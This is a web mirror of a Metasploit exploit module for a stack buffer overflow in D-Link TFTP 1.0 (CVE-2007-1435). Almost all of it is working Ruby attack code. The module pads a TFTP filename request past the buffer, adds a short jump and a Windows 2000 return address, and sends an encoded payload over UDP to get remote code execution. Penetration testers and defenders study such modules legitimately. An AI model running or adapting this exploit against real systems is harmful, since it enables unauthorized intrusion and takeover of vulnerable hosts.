Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/tftp/dlink_long_filename.rb
19514 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
include Msf::Exploit::Remote::Udp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
16
'Description' => %q{
17
This module exploits a stack buffer overflow in D-Link TFTP 1.0.
18
By sending a request for an overly long file name, an attacker
19
could overflow a buffer and execute arbitrary code. For best results,
20
use bind payloads with nonx (No NX).
21
},
22
'Author' => [
23
'LSO <lso[at]hushmail.com>', # Exploit module
24
'aushack', # Refs, stability, targets etc
25
],
26
'References' => [
27
[ 'CVE', '2007-1435' ],
28
[ 'OSVDB', '33977' ],
29
[ 'BID', '22923' ],
30
],
31
'DefaultOptions' => {
32
'EXITFUNC' => 'process',
33
},
34
'Payload' => {
35
'Space' => 1024,
36
'BadChars' => "\x00",
37
'Compat' =>
38
{
39
'ConnectionType' => '-reverse',
40
},
41
},
42
'SaveRegisters' => [ 'ecx', 'eax', 'esi' ],
43
'Platform' => 'win',
44
45
'Targets' => [
46
# Patrick tested OK 20090228
47
['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
48
['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
49
],
50
'Privileged' => false,
51
'DisclosureDate' => '2007-03-12',
52
'DefaultTarget' => 0,
53
'Notes' => {
54
'Reliability' => UNKNOWN_RELIABILITY,
55
'Stability' => UNKNOWN_STABILITY,
56
'SideEffects' => UNKNOWN_SIDE_EFFECTS
57
}
58
)
59
)
60
61
register_options(
62
[
63
Opt::RPORT(69)
64
], self
65
)
66
end
67
68
def exploit
69
connect_udp
70
71
print_status("Trying target #{target.name}...")
72
73
juju = "\x00\x01"
74
juju << Rex::Text.rand_text_alpha_upper(581)
75
juju << Rex::Arch::X86.jmp_short(42)
76
juju << Rex::Text.rand_text_alpha_upper(38)
77
juju << [target.ret].pack('V') + payload.encoded
78
79
udp_sock.put(juju)
80
81
handler
82
disconnect_udp
83
end
84
end
85
86